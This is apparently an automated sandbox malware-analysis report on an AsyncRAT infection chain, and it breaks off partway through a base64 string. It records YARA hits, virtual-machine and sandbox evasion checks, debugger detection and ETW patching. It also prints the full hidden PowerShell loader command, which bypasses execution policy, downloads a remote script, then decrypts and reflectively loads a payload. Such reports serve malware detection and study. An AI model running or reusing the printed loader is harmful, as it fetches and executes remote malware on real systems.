                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\LogonUI.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTR
                .NET source code contains a sample name check
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d31326fc88.4.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 5.2.powershell.exe.1d3130d3740.2.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7ce1adde0.11.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7cdfeefc8.0.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7ce012688.10.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Source: 11.2.powershell.exe.1d7ce019498.1.raw.unpack, tcsnk.cs.Net Code: Main contains sample name check
                Check if machine is in data center or colocation facility
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: powershell.exe, 00000005.00000002.2325412269.000001D312D1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: powershell.exe, 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLINFO
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4251Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5594Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6875
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2895
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6559
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3232
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7329
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2364
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5992
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep count: 6875 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -17524406870024063s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep count: 2895 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608Thread sleep count: 6559 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 560Thread sleep count: 3232 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4108Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep count: 7329 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368Thread sleep time: -23058430092136925s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep count: 2364 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6720Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep count: 5992 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 135 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 3900Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\dwm.exe TID: 6096Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                Source: powershell.exe, 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: powershell.exe, 00000012.00000002.2142824242.000001E1C1AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                Source: powershell.exe, 00000005.00000002.2571355130.000001D32A670000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2440680152.000002CC1EA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2624164433.0000020678CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: powershell.exe, 0000000B.00000002.1968300111.000001D7E484F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                Source: C:\Windows\System32\cdd.dllSystem information queried: ModuleInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8BE641 CheckRemoteDebuggerPresent,5_2_00007FFD9B8BE641
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                .NET source code references suspicious native API functions
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZ